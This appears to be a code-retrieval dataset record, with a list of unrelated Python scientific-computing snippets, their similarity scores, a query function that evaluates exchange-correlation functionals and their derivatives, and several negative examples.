set_tax_system(self, tauv):\n \n mtau=np.ones((self.Ns,1))*tauv\n \n if self.policy_type == 1 : #only output tax\n self.tau_output = mtau \n self.tau_capital = np.zeros((self.Ns, self.ntau))\n self.tau_labor = np.zeros((self.Ns, self.ntau))\n \n elif self.policy_type == 2: #only capital tax\n self.tau_output = np.zeros((self.Ns, self.ntau)) \n self.tau_capital = mtau\n self.tau_labor = np.zeros((self.Ns, self.ntau))\n \n else : #only labor tax\n self.tau_output = np.zeros((self.Ns, self.ntau)) \n self.tau_capital = np.zeros((self.Ns, self.ntau)) \n self.tau_labor = mtau", "def set_initial(self, value):\n # TODO: Make an Initial Stock Adjust here\n pass", "async def update_trade_minimums(self):\n\n trade_base_btc_pair = '{}-BTC'.format(config['trade_base'])\n\n if config['trade_base'] != 'BTC':\n trade_base_rate = self.base_rates[trade_base_btc_pair]\n else:\n trade_base_rate = 1.0\n\n base_mult = await self.get_pair_base_mult(config['trade_base'], trade_base_btc_pair)\n self.min_trade_size = trade_base_rate * config['trade_min_size_btc'] * base_mult\n self.min_safe_trade_size = self.min_trade_size * (1.0 + config['trade_min_safe_percent'])", "def _gammaParameter(self, t : float, dtau : float) -> float:\n pass", "def force_to_input_unit(self, force_val: float):\n pass", "def tau_ruptura( largo_falla, beta = 2500 ):\n\n # se chequean unidades de medida de beta, tiene que estar en metros/s, no km/s\n if beta < 1000:\n beta = beta * 1000\n else: \n beta = beta\n\n tau = largo_falla/( 0.8 * beta )\n\n return tau", "def set_temps_prepa(self, tp: int):\n self.temps_prepa = tp", "def set_tau_profile(self, function, side='both', min=0.0, max=None):\n if side.lower() == 'both':\n self.tau_f = np.clip(function(self.r_disk_f), a_min=min, a_max=max)\n self.tau_b = np.clip(function(self.r_disk_b), a_min=min, a_max=max)\n elif side.lower() == 'front':\n self.tau_f = np.clip(function(self.r_disk_f), a_min=min, a_max=max)\n elif side.lower() == 'back':\n self.tau_b = np.clip(function(self.r_disk_b), a_min=min, a_max=max)\n else:\n raise ValueError(\"`side` must be 'front', 'back' or 'both'.\")", "def test_set_Tp(self):\n s = State(substance=\"water\")\n s.Tp = Q_(400.0, \"K\"), Q_(101325.0, \"Pa\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.Tp[0], Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.Tp[1], Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.u, Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(7496.2021523754065, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cp, Q_(2009.2902478486988, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cv, Q_(1509.1482452129906, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(1.801983936953226, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(2730301.3859201893, \"J/kg\")) # type: ignore\n assert s.x is None\n assert s.phase == \"gas\"", "def set_initial_value(self, t, x):\n\n self.integrator.set_initial_value(x, t).set_f_params(self._params[\"args\"])\n try:\n testoutput = self.rhs(t, x, self.args)\n except:\n print(\"ODE function not callable\")\n raise\n\n super().set_initial_value(t, x)", "def cool(self):\n self.t = self.t - 1", "def tau_RC(run = 0):\n\n\n tau = {}\n \n tau[0] = { 0 : 0.000528448223727 ,\n 1 : 0.000534286124735 ,\n 2 : 0.000531127097197 ,\n 3 : 0.000528590936727 ,\n 4 : 0.000523307118588 ,\n 5 : 0.000531484578773 ,\n 6 : 0.000522540813269 ,\n 7 : 0.000529130885772 ,\n 8 : 0.000527471895065 ,\n 9 : 0.000527267947332 ,\n 10 : 0.000529931735586 ,\n 11 : 0.000527613470536 }\n \n \n tau[8088] = { 0 : 5.31332e-04 ,\n 1 : 5.36915e-04 ,\n 2 : 5.32637e-04 ,\n 3 : 5.30414e-04 ,\n 4 : 5.32376e-04 ,\n 5 : 5.42936e-04 ,\n 6 : 5.30456e-04 ,\n 7 : 5.39265e-04 ,\n 8 : 5.29270e-04 ,\n 9 : 0.000529219 ,\n 10 : 5.29847e-04 ,\n 11 : 5.28952e-04 }\n \n tau[8089] = { 0 : 5.31416e-04 ,\n 1 : 5.37008e-04 ,\n 2 : 5.33042e-04 ,\n 3 : 0.000530479 ,\n 4 : 5.32518e-04 ,\n 5 : 5.42983e-04 ,\n 6 : 5.30310e-04 ,\n 7 : 5.39168e-04 ,\n 8 : 0.000529401 ,\n 9 : 0.000529229 ,\n 10 : 0.000530108 , \n 11 : 0.000529216 }\n \n \n tau[8678] = { 0 : 5.31343e-04 ,\n 1 : 5.36915e-04 ,\n 2 : 5.32922e-04 ,\n 3 : 0.000530248 ,\n 4 : 0.000532365 ,\n 5 : 0.000542388 ,\n 6 : 0.000530768 ,\n 7 : 0.000539662 ,\n 8 : 0.000529246 ,\n 9 : 0.00052921 ,\n 10 : 0.000529816 ,\n 11 : 0.000529137 }\n\n if run not in tau:\n print (' tau_RC, requested run ', run , ' not available, default used')\n run = 0 \n \n return tau[run]", "def tau(self,x,n=50):\n sigma = np.zeros(n,dtype=np.int8)\n for k in range(n):\n if x<=self.rho:\n sigma[k] = 0\n x = self.f0(x)\n else:\n sigma[k] = 1\n x = self.f1(x)\n return sigma", "def _set_ks_static(self, ks):\n self.ks = ks\n if np.max(self.ks) > self._kret:\n self._kret = np.max(self.ks)", "def min_temp(self):\n if self._min_temp:\n return self._min_temp\n\n # get default temp from super class\n return super().min_temp", "def setTolerance(self, eps):\n self._simulator_.update(eps=eps)\n return", "def __init__(self):\n super().__init__()\n self.TERRAIN_VARIANCE = 0.0", "def setTCLimits(*args):\n args[0].Limit.TCLimit.tc_limit = args[1]", "def test_temperatures_value(self):\n self.assertEqual(self.TminValue, 450.0)", "def set_temperature(self, iteration):\n if self.annealing is False:\n self.annealing_temp = 1.0\n return\n\n if iteration < self.sample_size * 0.2:\n self.annealing_temp = 0.2\n elif iteration < self.sample_size * 0.3:\n self.annealing_temp = 0.4\n elif iteration < self.sample_size * 0.4:\n self.annealing_temp = 0.6\n elif iteration < self.sample_size * 0.5:\n self.annealing_temp = 0.8\n else:\n self.annealing_temp = 1.0", "def setValue(self, value):\r\n # Clamp values to [0,1]\r\n self.__value = max(0, min(value, 1))", "def SetTol(self, tol):\n return _hypre.HypreBoomerAMG_SetTol(self, tol)", "def set_time(self, value: float):\n if value < 0:\n value = 0\n\n self.controller.row = self.rps * value", "def set_temporal_adapted_epsilon(self):\n\t\t\n\t\t# Perfectly adapted activity level is based on the variables:\n\t\t# temporal_adaptation_mu_eps, temporal_adaptation_sigma_eps, \n\t\t# temporal_adaptation_mu_Ss0. These functions take the activity\n\t\t# level set by these variables at that signal intensity, to \n\t\t# adapt epsilon to the current Ss\n\t\tperfect_adapt_eps_base = sp.ones(self.Mm)*\\\n\t\t\t\tself.temporal_adaptation_mu_eps + random_matrix(self.Mm, \n\t\t\t\tparams=[0, self.temporal_adaptation_sigma_eps], \n\t\t\t\tseed=self.seed_eps)\n\t\tperfect_adapt_Ss = sp.zeros(self.Nn)\n\t\tperfect_adapt_Ss[self.Ss0 != 0] = self.temporal_adaptation_mu_Ss0\n\t\tperfect_adapt_Yy = receptor_activity(perfect_adapt_Ss, \n\t\t\t\t\t\t\t\tself.Kk1, self.Kk2, perfect_adapt_eps_base)\n\t\t\n\t\t# Make adaptation rate into a vector if it has not yet been set.\n\t\ttry:\n\t\t\tself.temporal_adaptation_rate_vector\n\t\texcept AttributeError:\n\t\t\tassert self.temporal_adaptation_rate_sigma == 0, \"Before \"\\\n\t\t\t\t\"setting new epsilon with set_temporal_adapted_epsilon, \"\\\n\t\t\t\t\"you must call set_ordered_temporal_adaptation_rate, since \"\\\n\t\t\t\t\"temporal_adaptation_rate_sigma is nonzero\"\n\t\t\tself.temporal_adaptation_rate_vector = sp.ones(self.Mm)*\\\n\t\t\t\tself.temporal_adaptation_rate\n\t\t\n\t\tif self.temporal_adaptation_type == 'imperfect':\n\t\t\td_eps_dt = self.temporal_adaptation_rate_vector*\\\n\t\t\t\t\t\t(self.Yy - perfect_adapt_Yy)\n\t\t\tdelta_t = self.signal_trace_Tt[1] - self.signal_trace_Tt[0]\n\t\t\tself.eps += delta_t*d_eps_dt \n\t\telif self.temporal_adaptation_type == 'perfect':\n\t\t\tself.eps = free_energy(self.Ss, self.Kk1, self.Kk2, \n\t\t\t\t\t\t\t\t\tperfect_adapt_Yy)", "def testImplicitMinValue(self):\n orig_scale = util.ScaleData\n util.ScaleData = self.FakeScale\n try:\n self.AddToChart(self.chart, [0, 10])\n self.chart.auto_scale.buffer = 0\n self.chart.display.Url(0, 0) # This causes a call to FakeScale.\n self.assertEqual(0, self.min)\n self.chart.left.min = -5\n self.chart.display.Url(0, 0) # This causes a call to FakeScale.\n self.assertEqual(-5, self.min)\n finally:\n util.ScaleData = orig_scale", "def min_auto(self) -> 'Size':\n self.minimum = 'auto'\n return self", "def auto(self):\n self.set_thermostat = 1 if self.desired_values[0] > self.data[0] else 0\n self.set_humidifier = 1 if self.desired_values[1] > self.data[1] else 0\n self.set_sprinklers = 1 if self.desired_values[2] > self.data[2] else 0\n self.set_ventilation = 1 if (self.desired_values[3] > self.data[3] or self.desired_values[4] < self.data[4]) else 0", "def _set_min_tx_interval(self, v, load=False):\n if hasattr(v, \"_utype\"):\n v = v._utype(v)\n try:\n t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"min-tx-interval\", rest_name=\"min-tx-interval\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\n except (TypeError, ValueError):\n raise ValueError({\n 'error-string': \"\"\"min_tx_interval must be of a type compatible with uint32\"\"\",\n 'defined-type': \"uint32\",\n 'generated-type': \"\"\"YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name=\"min-tx-interval\", rest_name=\"min-tx-interval\", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='uint32', is_config=True)\"\"\",\n })\n\n self.__min_tx_interval = t\n if hasattr(self, '_set'):\n self._set()", "def setTs(self, Ts):\r\n\t\tself.Ts = Ts\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def setTs(self, Ts):\r\n\t\tself.Ts = Ts\r\n\t\tself.OutputValueIncrement = (self.MaxValue - self.MinValue)/(self.RampDuration/self.Ts)", "def check_global_minima(self,value, t, index): \n if value < self._global_minima_value: # If the value is smaller we have a new minima\n self._global_minima_value = value \n elif value == self._global_minima_value: # If value is equal we're at a new minima pos\n if self._global_minima_t is not None and self._periodicity is None: # If periodicity is None then we need to set it\n self._periodicity = t-self._global_minima_t\n else: \n if self._index_of_first_minima is None:\n self._index_of_first_minima = index-1 # minus 1 bcs we have started to increase again.\n self._global_minima_t = t-self._step_size", "def reset(self):\n self.epsilon = self.start", "def tau_calculation(self, det, gt):\n return np.round((self.area_of_intersection(det, gt) / self.area(det)), 2)", "def init_tau(k, p, q): # whereas k = k + 4\n tau_matrix = np.zeros((k, k))\n for row in range(2, k - 2):\n tau_matrix[row][row + 1] = 1\n tau_matrix[0][1] = q\n tau_matrix[0][k - 2] = 1 - q\n tau_matrix[1][1] = 1 - p\n tau_matrix[1][2] = p\n tau_matrix[k - 2][k - 2] = 1 - p\n tau_matrix[k - 2][k - 1] = p\n tau_matrix[-1][-1] = 1\n tau_matrix = mf.log_marix(tau_matrix)\n return tau_matrix", "def setTmax(t, verbose=True):\n if t == None:\n s.setScriptDouble(odi.INDX_DBL_TMAX,0.0)\n s.setScriptBool(odi.INDX_BOOL_TMAX,False)\n if verbose:\n trackMessage('Unsetting maximum track length')\n else:\n s.setScriptDouble(odi.INDX_DBL_TMAX,helpers.convertHms(t))\n s.setScriptBool(odi.INDX_BOOL_TMAX,True)\n if verbose:\n trackMessage('Setting maximum track length to '+str(t)+ ' hours')", "def tauPoint(numDeps, tauRos, tau):\r\n\r\n #int index;\r\n\r\n help = [0.0 for i in range(numDeps)]\r\n\r\n for i in range(0, numDeps):\r\n\r\n help[i] = tauRos[0][i] - tau\r\n help[i] = abs(help[i])\r\n\r\n \r\n index = 0\r\n min = help[index]\r\n\r\n for i in range(1, numDeps):\r\n\r\n if (help[i] < min): \r\n min = help[i]\r\n index = i\r\n \r\n\r\n return index", "def adjust_k(self, ):\n self.iteration += 1\n\n if self.max_violation:\n self.k = 1\n return 1.\n\n self.k = (1.-self.beta**np.float(self.iteration))\n return self.k", "def adjust_k(self, ):\n self.iteration += 1\n\n if self.max_violation:\n self.k = 1\n return 1.\n\n self.k = (1.-self.beta**np.float(self.iteration))\n return self.k", "def rmin(self) -> float:\n return self.options.rmin", "def set_T(self, T):\n self.T = T", "def T_i(self, value: u.K):\n if value is None:\n self._T_i = np.repeat(self._T_e, self._number_of_particles)\n return\n\n if value.size == 1:\n self._T_i = np.repeat(value, self._number_of_particles)\n elif value.size == self._number_of_particles:\n self._T_i = value\n else:\n error_str = (\n \"T_i must be set with either one common temperature\"\n f\" for all ions, or a set of {self._number_of_particles} of them. \"\n )\n\n if value.size == 5 and self._number_of_particles != 5:\n error_str += f\" For {self.base_particle}, five is right out.\"\n raise ParticleError(error_str)", "def min_value(self, min_value):\n\n self._min_value = min_value", "def min_value(self, min_value):\n\n self._min_value = min_value", "def min_value(self, min_value):\n\n self._min_value = min_value", "def set_min_time(self, time):\n self.widget().setMinimumTime(time)", "def loadVal(self, newVal):\n if not newVal:\n self.size = self.defaultVal\n self.specified = False\n return\n try:\n self.size = float(newVal)\n except ValueError:\n self.size = self.defaultVal\n if self.size < LOWER_LIMIT or self.size > UPPER_LIMIT:\n self.size = self.defaultVal\n self.specified = True", "def SetTol(self, tol):\n return _hypre.HyprePCG_SetTol(self, tol)", "def max_temp(self):\n return 99", "def _set_minimum_value(self, value):\n # Check if the current value is not None, and if so, throw an error\n # because this property should not be set twice\n if self._get_minimum_value() is not None:\n raise RuntimeError('maximum value should not be set twice')\n\n # If the value is None, ignore it\n if value is None:\n return\n\n # Set the value\n self._minimum_value = value", "def nt(self, val):\n if isinstance(val, int):\n if val != self._faux._nt:\n self._faux._nt = val\n self._faux._update()\n else:\n warn(\"`val` not valid, no update performed\")", "def initialise_target(self, c, key):\n if key == 'p':\n return 1e5\n elif key == 'h':\n if self.Q.val < 0 and self.Q.is_set:\n return 5e5\n elif self.Q.val > 0 and self.Q.is_set:\n return 1e5\n else:\n return 3e5", "def setUp(self):\n self.t = True\n self.f = False\n self.value = 25", "def initial(self):\n return zero", "def fill_with_neg_inf(t):\r\n return t.float().fill_(float(\"-inf\")).type_as(t)", "def set_min_position(self, min_us):\n raise NotImplementedError()", "def weight_expr_ahead(self, t, tau, w_plus, z, value):\n return self.weight_expr(t, w_plus, z, value)", "def tau_plus(self,x,n=50):\n sigma = np.zeros(n,dtype=np.int8)\n for k in range(n):\n if x>=self.rho:\n sigma[k] = 1\n x = self.f1(x)\n else:\n sigma[k] = 0\n x = self.f0(x)\n return sigma", "def set_temperature(self):\n self.temperature = self.gui.doubleSpinBox_temperature.value()\n self.logger.debug('Changing the temperature to {}K'.format(self.temperature))\n\n self.anc350_instrument.temperature = self.temperature\n self.anc350_instrument.set_temperature_limits()\n\n self.max_dclevel_V = self.anc350_instrument.max_dC_level\n\n self.logger.debug('Changed the scanner piezo limits to {}'.format(self.max_dclevel_V))", "def _adapt_time(self):\n self.time = min(max(self.time, self.minimum), self.maximum)", "def SetTol(self, tol):\n return _hypre.HypreAME_SetTol(self, tol)", "def set_xmin(self, xmin):\n self.__xmin = xmin", "def update_temperature(self):\n self.iteration += 1 \n self.T = self.T0 * 0.9935**self.iteration", "def tau_plus_minus(self):\n ct = self.cartan_type()\n L,R = ct.index_set_bipartition()\n return self.tau_epsilon_operator_on_almost_positive_roots(L), self.tau_epsilon_operator_on_almost_positive_roots(R)", "def adjust_u(self):\r\n # compute the volume integrals of the x,y, and z components of u\r\n ux = assemble(self.u.sub(0)*dx)\r\n uy = assemble(self.u.sub(1)*dx)\r\n uz = assemble(self.u.sub(2)*dx)\r\n\r\n # create a function of value 1, which can be integrated.\r\n try:\r\n self.unit\r\n except AttributeError:\r\n self.unit = Function(self.Q)\r\n self.unit.assign(Constant(1))\r\n\r\n # compute the volume of the body\r\n Vol = assemble(self.unit*dx)\r\n\r\n try:\r\n self.umean\r\n except AttributeError:\r\n self.umean = Function(self.Z)\r\n\r\n # compute the volume-averaged component means\r\n self.umean.assign(Constant((ux/Vol, uy/Vol, uz/Vol, 0)))\r\n\r\n # subtract the mean from the solution function\r\n self.up.assign(self.up-self.umean)", "def set_temps_cuisson(self, tc: int):\n self.temps_cuisson = tc", "def set_capacity(self, cap):\n self._capacity.type = 'value'\n self._capacity._value = float(cap) # TODO getter/setter", "def test_set_Tu(self):\n s = State(substance=\"water\")\n s.Tu = Q_(400.0, \"K\"), Q_(2547715.3635084038, \"J/kg\")\n # Pylance does not support NumPy ufuncs\n assert np.isclose(s.T, Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.p, Q_(101325.0, \"Pa\")) # type: ignore\n assert np.isclose(s.Tu[0], Q_(400.0, \"K\")) # type: ignore\n assert np.isclose(s.Tu[1], Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.u, Q_(2547715.3635084038, \"J/kg\")) # type: ignore\n assert np.isclose(s.s, Q_(7496.2021523754065, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cp, Q_(2009.2902478486988, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.cv, Q_(1509.1482452129906, \"J/(kg*K)\")) # type: ignore\n assert np.isclose(s.v, Q_(1.801983936953226, \"m**3/kg\")) # type: ignore\n assert np.isclose(s.h, Q_(2730301.3859201893, \"J/kg\")) # type: ignore\n assert s.x is None" ]
[ "0.64921534", "0.61496323", "0.61187613", "0.6012751", "0.59901506", "0.58402216", "0.5835517", "0.56944895", "0.5693752", "0.5693752", "0.5661594", "0.55744827", "0.55099267", "0.5492436", "0.5492436", "0.54596823", "0.5449228", "0.5433668", "0.54214495", "0.54214495", "0.5411966", "0.5409943", "0.5402922", "0.5362139", "0.5313241", "0.53024226", "0.5297017", "0.5284732", "0.52641743", "0.52622175", "0.5248869", "0.5234751", "0.52324486", "0.5232044", "0.52046776", "0.51834524", "0.5160402", "0.5136518", "0.51357466", "0.5133935", "0.51316875", "0.51275766", "0.5125277", "0.5120953", "0.5113571", "0.5102178", "0.50996375", "0.50928557", "0.5080456", "0.5066488", "0.5061649", "0.50611925", "0.5041635", "0.5038951", "0.50351113", "0.50327563", "0.5032352", "0.5022545", "0.50163287", "0.5012658", "0.5001383", "0.49958864", "0.49958864", "0.49858662", "0.4985215", "0.49784264", "0.49761015", "0.49739185", "0.49665332", "0.49485356", "0.49485356", "0.4944633", "0.4936339", "0.49338433", "0.4926408", "0.4926408", "0.4926408", "0.49204803", "0.49117327", "0.4902303", "0.49000016", "0.48974577", "0.48954827", "0.48907635", "0.48905376", "0.4889493", "0.48754337", "0.4871019", "0.48709977", "0.48693416", "0.48661268", "0.4859721", "0.48541436", "0.48484203", "0.4845611", "0.48389095", "0.48381764", "0.483594", "0.48327437", "0.48325035" ]
0.60347635
3
Evaluates the functional and its derivatives on a grid.
def compute(self, inp, output=None, do_exc=True, do_vxc=True, do_fxc=False, do_kxc=False, do_lxc=False): # Check flags if not self._have_exc and do_exc: raise ValueError("Functional '%s' does not have EXC capabilities." % self.get_name()) if not self._have_vxc and do_vxc: raise ValueError("Functional '%s' does not have VXC capabilities built in." % self.get_name()) if not self._have_fxc and do_fxc: raise ValueError("Functional '%s' does not have FXC capabilities built in." % self.get_name()) if not self._have_kxc and do_kxc: raise ValueError("Functional '%s' does not have KXC capabilities built in." % self.get_name()) if not self._have_lxc and do_lxc: raise ValueError("Functional '%s' does not have LXC capabilities built in." % self.get_name()) # Parse input arrays if isinstance(inp, np.ndarray): inp = {"rho": np.asarray(inp, dtype=np.double)} elif isinstance(inp, dict): inp = {k: np.asarray(v, dtype=np.double) for k, v in inp.items()} else: raise KeyError("Input must have a 'rho' variable or a single array.") # How long are we? npoints = int(inp["rho"].size / self._spin) if (inp["rho"].size % self._spin): raise ValueError("Rho input has an invalid shape, must be divisible by %d" % self._spin) # Find the right compute function args = [self.xc_func, ctypes.c_size_t(npoints)] if self.get_family() in [flags.XC_FAMILY_LDA, flags.XC_FAMILY_HYB_LDA]: input_labels = ["rho"] input_num_args = 1 output_labels = [ "zk", # 1, 1 "vrho", # 1, 2 "v2rho2", # 1, 3 "v3rho3", # 1, 4 "v4rho4" # 1, 5 ] # Build input args output = _check_arrays(output, output_labels[0:1], self.xc_func_sizes, npoints, do_exc) output = _check_arrays(output, output_labels[1:2], self.xc_func_sizes, npoints, do_vxc) output = _check_arrays(output, output_labels[2:3], self.xc_func_sizes, npoints, do_fxc) output = _check_arrays(output, output_labels[3:4], self.xc_func_sizes, npoints, do_kxc) output = _check_arrays(output, output_labels[4:5], self.xc_func_sizes, npoints, do_lxc) args.extend([ inp[x] for x in input_labels]) args.extend([output[x] for x in output_labels]) core.xc_lda(*args) elif self.get_family() in [flags.XC_FAMILY_GGA, flags.XC_FAMILY_HYB_GGA]: input_labels = ["rho", "sigma"] input_num_args = 2 output_labels = [ "zk", # 1, 1 "vrho", "vsigma", # 2, 3 "v2rho2", "v2rhosigma", "v2sigma2", # 3, 6 "v3rho3", "v3rho2sigma", "v3rhosigma2", "v3sigma3", # 4, 10 "v4rho4", "v4rho3sigma", "v4rho2sigma2", "v4rhosigma3", "v4sigma4" # 5, 15 ] # Build input args output = _check_arrays(output, output_labels[0:1], self.xc_func_sizes, npoints, do_exc) output = _check_arrays(output, output_labels[1:3], self.xc_func_sizes, npoints, do_vxc) output = _check_arrays(output, output_labels[3:6], self.xc_func_sizes, npoints, do_fxc) output = _check_arrays(output, output_labels[6:10], self.xc_func_sizes, npoints, do_kxc) output = _check_arrays(output, output_labels[10:15], self.xc_func_sizes, npoints, do_lxc) args.extend([ inp[x] for x in input_labels]) args.extend([output[x] for x in output_labels]) core.xc_gga(*args) elif self.get_family() in [flags.XC_FAMILY_MGGA, flags.XC_FAMILY_HYB_MGGA]: # Build input args if self._needs_laplacian: input_labels = ["rho", "sigma", "lapl", "tau"] else: input_labels = ["rho", "sigma", "tau"] input_num_args = 4 output_labels = [ "zk", # 1, 1 "vrho", "vsigma", "vlapl", "vtau", # 4, 5 "v2rho2", "v2rhosigma", "v2rholapl", "v2rhotau", "v2sigma2", # 10, 15 "v2sigmalapl", "v2sigmatau", "v2lapl2", "v2lapltau", "v2tau2", "v3rho3", "v3rho2sigma", "v3rho2lapl", "v3rho2tau", "v3rhosigma2", # 20, 35 "v3rhosigmalapl", "v3rhosigmatau", "v3rholapl2", "v3rholapltau", "v3rhotau2", "v3sigma3", "v3sigma2lapl", "v3sigma2tau", "v3sigmalapl2", "v3sigmalapltau", "v3sigmatau2", "v3lapl3", "v3lapl2tau", "v3lapltau2", "v3tau3", "v4rho4", "v4rho3sigma", "v4rho3lapl", "v4rho3tau", "v4rho2sigma2", # 35, 70 "v4rho2sigmalapl", "v4rho2sigmatau", "v4rho2lapl2", "v4rho2lapltau", "v4rho2tau2", "v4rhosigma3", "v4rhosigma2lapl", "v4rhosigma2tau", "v4rhosigmalapl2", "v4rhosigmalapltau", "v4rhosigmatau2", "v4rholapl3", "v4rholapl2tau", "v4rholapltau2", "v4rhotau3", "v4sigma4", "v4sigma3lapl", "v4sigma3tau", "v4sigma2lapl2", "v4sigma2lapltau", "v4sigma2tau2", "v4sigmalapl3", "v4sigmalapl2tau", "v4sigmalapltau2", "v4sigmatau3", "v4lapl4", "v4lapl3tau", "v4lapl2tau2", "v4lapltau3", "v4tau4" ] # Build input args output = _check_arrays(output, output_labels[0:1], self.xc_func_sizes, npoints, do_exc) output = _check_arrays(output, output_labels[1:5], self.xc_func_sizes, npoints, do_vxc) output = _check_arrays(output, output_labels[5:15], self.xc_func_sizes, npoints, do_fxc) output = _check_arrays(output, output_labels[15:35], self.xc_func_sizes, npoints, do_kxc) output = _check_arrays(output, output_labels[35:70], self.xc_func_sizes, npoints, do_lxc) args.extend([ inp[x] for x in input_labels]) if not self._needs_laplacian: args.insert(-1, np.empty((1))) # Add none ptr to laplacian args.extend([output[x] for x in output_labels]) core.xc_mgga(*args) else: raise KeyError("Functional kind not recognized! (%d)" % self.get_kind()) return {k: v for k, v in zip(output_labels, args[2+input_num_args:]) if not v is None}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def grid_eval(self, gridaxes):\n assert len(gridaxes) == self.sdim, \"Input has wrong dimension\"\n # make sure axes are one-dimensional\n if not all(np.ndim(ax) == 1 for ax in gridaxes):\n gridaxes = tuple(np.squeeze(ax) for ax in gridaxes)\n assert all(ax.ndim == 1 for ax in gridaxes), \\\n \"Grid axes should be one-dimensional\"\n colloc = [collocation(self.kvs[i], gridaxes[i]) for i in range(self.sdim)]\n return apply_tprod(colloc, self.coeffs)", "def test_multiple_expvals_grad(self, execute_kwargs):\n dev = qml.device(\"default.qubit\", wires=2)\n params = jax.numpy.array([0.1, 0.2, 0.3])\n\n def cost(a, cache):\n with qml.queuing.AnnotatedQueue() as q:\n qml.RY(a[0], wires=0)\n qml.RX(a[1], wires=0)\n qml.RY(a[2], wires=0)\n qml.expval(qml.PauliZ(0))\n qml.expval(qml.PauliZ(1))\n\n tape = qml.tape.QuantumScript.from_queue(q)\n\n res = qml.interfaces.execute([tape], dev, cache=cache, **execute_kwargs)[0]\n return res[0] + res[1]\n\n res = jax.jit(jax.grad(cost), static_argnums=1)(params, cache=None)\n assert res.shape == (3,)", "def evaluate_df(self, df):\n ## Check invariant; model inputs must be subset of df columns\n var_diff = set(self.var).difference(set(df.columns))\n if len(var_diff) != 0:\n raise ValueError(\n \"Model inputs not a subset of given columns;\\n\"\n + \"missing var = {}\".format(var_diff)\n )\n\n df_tmp = df.copy().drop(self.out, axis=1, errors=\"ignore\")\n ## Evaluate each function\n for func in self.functions:\n ## Concatenate to make intermediate results available\n df_tmp = concat((df_tmp, func.eval(df_tmp)), axis=1)\n\n return df_tmp[self.out]", "def evaluate(\n self, nodes, derivatives=np.array([0, 0, 0]), modes=None, unique=False\n ):", "def _evalAndDer(self, x):\n m = len(x)\n fx = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n fx[:, j] = self.functions[j](x)\n i = self.argcompare(fx, axis=1)\n y = fx[np.arange(m), i]\n dydx = np.zeros_like(y)\n for j in range(self.funcCount):\n c = i == j\n dydx[c] = self.functions[j].derivative(x[c])\n return y, dydx", "def _evalAndDer(self, x):\n m = len(x)\n fx = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n fx[:, j] = self.functions[j](x)\n i = self.argcompare(fx, axis=1)\n y = fx[np.arange(m), i]\n dydx = np.zeros_like(y)\n for j in range(self.funcCount):\n c = i == j\n dydx[c] = self.functions[j].derivative(x[c])\n return y, dydx", "def _evaluate_gradient(self, **variables):\n pass", "def eval_func_on_grid(f, re, im, N):\n l = re[1] - re[0]\n h = im[1] - im[0]\n resL = N*l #horizontal resolution\n resH = N*h #vertical resolution\n x = np.linspace(re[0], re[1],resL)\n y = np.linspace(im[0], im[1], resH)\n x, y = np.meshgrid(x,y)\n z = x + 1j*y\n w = f(z)\n return w", "def evaluate(params, grid):\n return np.zeros(grid.shape)", "def __call__ ( self , func , x , h , der = False ) :\n\n ## calculate differences \n imax = self.__order + 2 if der else self.__order + 1\n i = 0\n while i < imax : \n j = i + 1\n self.__df[i] = func ( x + j * h ) - func ( x - j * h )\n i += 1\n \n ## 1) calculate 1st derivative \n result = dot_fma ( self.__order + 1 , self.__df , self.__d1 ) / ( self.__sf1 * h ) \n if not der : return result \n \n ## 2) calculate Nth derivative \n dd = dot_fma ( self.__order + 2 , self.__df , self.__d2 ) / ( self.__sf2 * h**(self.__order*2+3) ) \n \n return result, dd", "def run_grid(tb_data, dsp_config, grid, fom_function, dtype=np.float64, db_dict=None, verbosity=0):\n\n grid_values = np.ndarray(shape=grid.get_shape(), dtype=dtype)\n iii = grid.get_zero_indices()\n if verbosity > 0: print(\"Starting grid calculations...\")\n while True: \n grid.set_dsp_pars(dsp_config, iii)\n if verbosity > 1: pprint(dsp_config)\n if verbosity > 0: grid.print_data(iii)\n grid_values[tuple(iii)] = run_one_dsp(\n tb_data, dsp_config, db_dict=db_dict, fom_function=fom_function, verbosity=verbosity)\n if verbosity > 0: print('Value:', grid_values[tuple(iii)])\n if not grid.iterate_indices(iii): break\n return grid_values", "def _evaluate(self, x, y, z):\n if _isscalar(x):\n x_pos = max(min(self.xSearchFunc(self.x_list, x), self.x_n - 1), 1)\n y_pos = max(min(self.ySearchFunc(self.y_list, y), self.y_n - 1), 1)\n z_pos = max(min(self.zSearchFunc(self.z_list, z), self.z_n - 1), 1)\n else:\n x_pos = self.xSearchFunc(self.x_list, x)\n x_pos[x_pos < 1] = 1\n x_pos[x_pos > self.x_n - 1] = self.x_n - 1\n y_pos = self.ySearchFunc(self.y_list, y)\n y_pos[y_pos < 1] = 1\n y_pos[y_pos > self.y_n - 1] = self.y_n - 1\n z_pos = self.zSearchFunc(self.z_list, z)\n z_pos[z_pos < 1] = 1\n z_pos[z_pos 